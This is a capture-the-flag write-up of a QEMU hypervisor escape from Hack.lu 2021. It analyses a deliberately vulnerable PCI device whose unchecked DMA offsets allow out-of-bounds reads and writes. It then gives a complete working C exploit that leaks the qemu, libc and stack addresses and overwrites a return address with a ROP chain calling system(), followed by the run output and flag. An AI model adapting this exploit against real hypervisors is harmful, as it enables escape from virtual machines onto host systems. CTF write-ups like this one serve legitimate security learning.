cloudinspect - Hack.lu CTF 2021

This was my first time ever writing an exploit for a hypervisor escape, and it got only 14 solves during the duration of the CTF (one of which was ours).

Note: Not everything in this writeup may be technically correct, let me know if I messed up anywhere :)

tl;dr

  • Vulnerable PCI device in qemu
  • Relative OOB r/w

Analysis

The qemu patch adds an intentionally vulnerable PCI device called cloudinspect. This device supports DMA and mmio (memory-mapped i/o), and lets have a look at a few relevant functions.

The following structure stores the state of the device:

struct CloudInspectState {
    PCIDevice pdev;
    MemoryRegion mmio;
    AddressSpace *as;

    struct dma_state {
        dma_addr_t src;
        dma_addr_t dst;
        dma_addr_t cnt;
        dma_addr_t cmd;
    } dma;
    char dma_buf[0x1000];
};

We can see that the device has 4 registers - src, dst, cnt and cmd. It also has a buffer dma_buf to which we can read and write data from the guest (more on how this works later).

Using the following mmio handlers, we can trigger certain handler functions by simply accessing specific physical memory addresses.

static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    CloudInspectState *cloudinspect = opaque;
    uint64_t val = ~0ULL;

    switch (addr) {
    case 0x00:
        val = 0xc10dc10dc10dc10d;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CMD:
        val = cloudinspect->dma.cmd;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_SRC:
        val = cloudinspect->dma.src;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_DST:
        val = cloudinspect->dma.dst;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CNT:
        val = cloudinspect->dma.cnt;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
        val = cloudinspect_DMA_op(cloudinspect, false);
        break;
    }

    return val;
}

static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val,
                unsigned size)
{
    CloudInspectState *cloudinspect = opaque;

    switch (addr) {
    case CLOUDINSPECT_MMIO_OFFSET_CMD:
        cloudinspect->dma.cmd = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_SRC:
        cloudinspect->dma.src = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_DST:
        cloudinspect->dma.dst = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_CNT:
        cloudinspect->dma.cnt = val;
        break;
    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:
        val = cloudinspect_DMA_op(cloudinspect, true);
        break;
    }
}

When we access the physical memory allocated for the PCI device at specific offsets, certain functions are triggered (this will trigger mmio_write functions if we write to the memory, and mmio_read functions if we read from it). The exact offsets that we need to access to trigger said functions are defined here:

#define CLOUDINSPECT_MMIO_OFFSET_CMD 0x78
#define CLOUDINSPECT_MMIO_OFFSET_SRC 0x80
#define CLOUDINSPECT_MMIO_OFFSET_DST 0x88
#define CLOUDINSPECT_MMIO_OFFSET_CNT 0x90
#define CLOUDINSPECT_MMIO_OFFSET_TRIGGER 0x98

These mmio handlers can be used to set and retrieve registers, and also to trigger the cloudinspect_DMA_op function.

static bool cloudinspect_DMA_op(CloudInspectState *cloudinspect, bool write) {
    switch (cloudinspect->dma.cmd) {
        case CLOUDINSPECT_DMA_GET_VALUE:
        case CLOUDINSPECT_DMA_PUT_VALUE:
            if (cloudinspect->dma.cnt > DMA_SIZE) {
                return false;
            }
            cloudinspect_dma_rw(cloudinspect, write);
            break;
        default:
            return false;
    }

    return true;
}

static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write)
{
    if (write) {
        uint64_t dst = cloudinspect->dma.dst;
        // DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device
        dma_memory_read(cloudinspect->as, cloudinspect->dma.src, cloudinspect->dma_buf + dst, cloudinspect->dma.cnt);
    } else {
        uint64_t src = cloudinspect->dma.src;
        // DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device
        dma_memory_write(cloudinspect->as, cloudinspect->dma.dst, cloudinspect->dma_buf + src, cloudinspect->dma.cnt);
    }
}

As you can see here, if we access the trigger offset, it triggers r/w to the dma_buf, from the guest. Read/write is handled using the src, dst and cnt registers, so setting these would be sufficient to perform controlled read/write.

  • dma_memory_read(cloudinspect->as, cloudinspect->dma.src, cloudinspect->dma_buf + dst, cloudinspect->dma.cnt); -> Here dma.src should contain a controlled address space, and dma.cnt bytes are read from dma_buf + dst into dma.src.
  • dma_memory_write(cloudinspect->as, cloudinspect->dma.dst, cloudinspect->dma_buf + src, cloudinspect->dma.cnt); -> Here dma.dst should contain a controlled address space, and dma.cnt bytes are written to dma_buf + src from dma.dst.

The only check here is if (cloudinspect->dma.cnt > DMA_SIZE), meaning that the dst and src registers are unchecked, allowing for oob r/w relative to dma_buf.

Exploitation

Now we need to interact with the device, so we need to find the physical memory allocated for the device in order to trigger the mmio handler functions.

For this, we can simply boot up the qemu vm, and use the command lspci, and identify the PCI device:

static void cloudinspect_class_init(ObjectClass *class, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);

    k->realize = pci_cloudinspect_realize;
    k->exit = pci_cloudinspect_uninit;
    k->vendor_id = 0x1337;
    k->device_id = 0x1337;
    k->revision = 0xc1;
    k->class_id = PCI_CLASS_OTHERS;
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

We can use the vendor ID and device ID defined here to identify the device. Once we identify the device, simply viewing /proc/iomem will give us the physical address where the device is mapped, the address was 0xfeb00000 and the size was 0x100000 in our case.

Now we can simply open and mmap /dev/mem at the offset and with the size that we got, and we have access to the physical memory to be able to access the mmio functions (thanks to this blogpost for the explanation).

void* devmap(size_t offset)
{
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    void* result = mmap(NULL, mmio_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, mmio_addr);
    close(fd);
    return result;
}

To use DMA memory read and write functions, we need the physical address of a buffer we have control over, so for this we can just mmap a buffer, and get its physical address from its virtual address using this function (again thanks to this blogpost).

size_t virt_to_phys(void* addr)
{
    int fd = open("/proc/self/pagemap", O_RDONLY);
    size_t offset = (size_t)addr / getpagesize() * PAGEMAP_LENGTH;
    lseek(fd, offset, SEEK_SET);
    size_t page_frame_number = 0;
    read(fd, &page_frame_number, PAGEMAP_LENGTH);
    page_frame_number &= 0x7FFFFFFFFFFFFF;
    close(fd);
    return (page_frame_number << 12) | ((size_t)addr & 0xfff);
}

Now, simply accessing the device’s physical memory address at the offsets defined for each functionality will allow us to both set registers, and trigger r/w between our mmapped buffer and the dma_buf.

From here onwards the exploit is fairly straightforward, we can read out-of-bounds relative to the dma_buf, so debugging and dumping memory allowed us to leak the base address of the qemu ELF, the address of dma_buf, and the libc base address.

After this, we looked for multiple targets to overwrite and get a shell, but on leaking the address of libc, we found that the VM was probably running on Ubuntu 20.04.

Being in a typical CTF rush, we just popped up a 20.04 instance, and went for a cheesy and CTF-style route of exploitation -

  • Used the libc address to offset to libc environ from dma_buf, leaked stack from environ, and offsetted to a qemu return address.
  • Overwrote the return address with a small ropchain to set rdi to dma_buf, and return to system with a controlled argument.

We were only able to see stderr, so calling system("cat flag >&2") gave us the flag!

Exploit script

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdbool.h>

#define PAGEMAP_LENGTH sizeof(size_t)
unsigned int mmio_addr = 0xfeb00000;
unsigned int mmio_size = 0x100000;
char* mmio = 0;

#define CLOUDINSPECT_MMIO_OFFSET_CMD 0x78
#define CLOUDINSPECT_MMIO_OFFSET_SRC 0x80
#define CLOUDINSPECT_MMIO_OFFSET_DST 0x88
#define CLOUDINSPECT_MMIO_OFFSET_CNT 0x90
#define CLOUDINSPECT_MMIO_OFFSET_TRIGGER 0x98

typedef uint64_t u64;

void* devmap(size_t offset)
{
    int fd = open("/dev/mem", O_RDWR | O_SYNC);

    void* result = mmap(NULL, mmio_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, mmio_addr);

    close(fd);

    return result;
}

size_t virt_to_phys(void* addr)
{
    int fd = open("/proc/self/pagemap", O_RDONLY);

    size_t offset = (size_t)addr / getpagesize() * PAGEMAP_LENGTH;
    lseek(fd, offset, SEEK_SET);

    size_t page_frame_number = 0;
    read(fd, &page_frame_number, PAGEMAP_LENGTH);

    page_frame_number &= 0x7FFFFFFFFFFFFF;
 
    close(fd);

    return (page_frame_number << 12) | ((size_t)addr & 0xfff);
}

void set_cmd(u64 val)
{
    *(u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_CMD] = val;
}

void set_src(u64 val)
{
    *(u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_SRC] = val;
}

void set_dst(u64 val)
{
    *(u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_DST] = val;
}

void set_cnt(u64 val)
{
    *(u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_CNT] = val;
}

void trigger_write(void)
{
    *(u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_TRIGGER] = 1;
}

u64 trigger_read()
{
    return *(u64*)&mmio[CLOUDINSPECT_MMIO_OFFSET_TRIGGER];
}

void do_write(u64 src, u64 dst, u64 size) 
{
    set_cmd(1);
    set_src(src);
    set_dst(dst);
    set_cnt(size);
    trigger_write();
}

void do_read(u64 src, u64 dst, u64 size) 
{
    set_cmd(1);
    set_src(src);
    set_dst(dst);
    set_cnt(size);
    trigger_read();
}

int main(void)
{
    // Get the device's physical memory address
    mmio = devmap(mmio_addr);

    // Allocate a buffer to use for physical memory access as tmp space
    size_t* tmp_buf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);

    // Force access to it so the CPU allocs physical memory for it
    memset(tmp_buf, 0xcc, 0x1000);
    printf("virtual address: %p\n", (void*)tmp_buf);

    // Get the physical address from /proc/self/pagemap
    size_t physical_mem = virt_to_phys(tmp_buf);
    printf("physical address: %p\n", (void*)physical_mem);

    // Test if write is working (for debug)
    tmp_buf[0] = 0xdeadbeefcafebabe;
    do_write(physical_mem, 0, 0x8);

    u64 offset;

    // Leak qemu base
    offset = 0x1030;
    do_read(offset, physical_mem, 0x8);
    u64 qemu_base = tmp_buf[0] - 0x37f510;
    printf("qemu base: 0x%lx\n", qemu_base);

    // Leak dma_buf
    offset = 0x1310;
    do_read(offset, physical_mem, 0x8);
    u64 dma_buf = tmp_buf[0] - 0x1388;
    printf("dma_buf: 0x%lx\n", dma_buf);

    // Leak libc
    offset = 0x2270;
    do_read(offset, physical_mem, 0x8);
    u64 libc_base = tmp_buf[0] - 0x1ebbe0;
    printf("libc base: 0x%lx\n", libc_base);

    u64 gadget = libc_base + 0xe6c7e;
    u64 libc_system = libc_base + 0x55410;
    u64 pop_rdi = libc_base + 0x26b72;
    u64 ret = libc_base + 0x25679;

    // Leak stack
    offset = libc_base + 0x1ef2e0 - dma_buf;
    do_read(offset, physical_mem, 0x8);
    u64 stack = tmp_buf[0] - 0x1c0;
    printf("stack: 0x%lx\n", stack);

    // Overwrite start of dma_buf to "cat flag >&2"
    tmp_buf[0] = 0x67616c6620746163;
    tmp_buf[1] = 0x32263e;
    do_write(physical_mem, 0, 0x10);
    printf("Write 1 complete!\n");

    // ret to system(dma_buf)
    tmp_buf[0] = pop_rdi;
    tmp_buf[1] = dma_buf;
    tmp_buf[2] = ret;
    tmp_buf[3] = libc_system;

    offset = stack - dma_buf;
    do_write(physical_mem, offset, 0x20);
    printf("Write 2 complete!\n");

    return 0;

}

Flag

SeaBIOS (version 1.13.0-1ubuntu1.1)
Booting from ROM.
virtual address: 0x7f19a7b8d000
physical address: 0x641c000
qemu base: 0x55f3033bd000
dma_buf: 0x55f30662ed88
libc base: 0x7f7cb5229000
stack: 0x7ffd17324288
Write 1 complete!
Write 2 complete!
The system is going down NOW!
Sent SIGTERM to all processes
Sent SIGKILL to all processes
Requesting system poweroff
flag{cloudinspect_inspects_your_cloud_0107}

Overall, a really fun challenge, and my first ever hypervisor escape!